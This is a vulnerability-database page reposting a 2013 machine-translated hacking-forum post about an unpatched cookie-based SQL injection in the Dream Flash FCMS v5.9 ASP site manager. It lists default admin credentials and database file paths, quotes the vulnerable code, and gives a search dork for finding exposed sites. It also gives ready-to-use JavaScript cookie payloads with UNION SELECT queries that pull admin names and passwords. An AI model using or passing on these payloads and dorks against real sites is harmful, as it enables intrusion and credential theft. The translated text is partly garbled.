Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58X0dayMYHACK58:62201338863
HistoryMay 20, 2013 - 12:00 a.m.

Dream Flash website management system FCMS v5. 9 newest vulnerabilities 0day-vulnerability warning-the black bar safety net

2013-05-2000:00:00
x0day
www.myhack58.com
11
JSON

Dream Flash website management system FCMS v5. 9 the latest vulnerability 0day

The database address: xmlEditor/database/####@@@datas.mdb

Background xmleditor/login. asp admin/admin

Message database: guestbook/db/sywl. asp

the cookie injected into the drain

Vulnerability file:

xml/text. asp

Vulnerability code:

<!–# include file=”…/conn. asp”–> //contains filtered get and post the file, but ignored the cookies

<%

flowNo = Request(“flowNo”) //Request get not only get and post Oh~~it!

if flowNo <> “” then //flowNo if it is not equal to null just to perform to you!

set rs=server. CreateObject(“ADODB. RecordSet”)

rs. Source=”select * from xmlContent where flowNo=”&flowNo

rs. Open rs. Source,conn,1,1

//the xml syntax, burst information will appear in the title inside~it!

Response. Write “<? xml version=‘1.0’ encoding=‘utf-8’?& gt;”&chr(1 3)

Response. Write “<main>” & chr(1 3)

Response. Write “<title><! [CDATA["

Response. Write rs(“tx”)

Response. Write "]]></title>”& chr(1 3)

Response. Write “<text><! [CDATA["

Response. Write rs(“description”)

Response. Write "]]></text>”& chr(1 3)

rs. Close

Set rs=nothing

conn. Close

Set conn=nothing

Response. Write “</main>”

end if

%>

Brief description: in fact, this cookie injection vulnerability in the root directory of the new. the asp file also exists, but the use of inconvenient, and a custom jump home==~to! However, in the text. asp this file inside hasn’t added anything to jump or the like, so the use of easy~!

Keywords: inurl:”xmleditor/login. asp”

EXP:

javascript:alert(document. cookie=”flowNo=”+escape(“1 4 union select 1,2,3,adminname from XmlAdmin”));

javascript:alert(document. cookie=”flowNo=”+escape(“1 4 union select 1,2,3,adminpwd from XmlAdmin”));

PS:note that this EXP exploits appear somewhere not in the page Oh, the page is blank, broke the account and password is appear in the title which is the title of~ it! Please carefully observe the Oh~it!

Sleep~!

JSON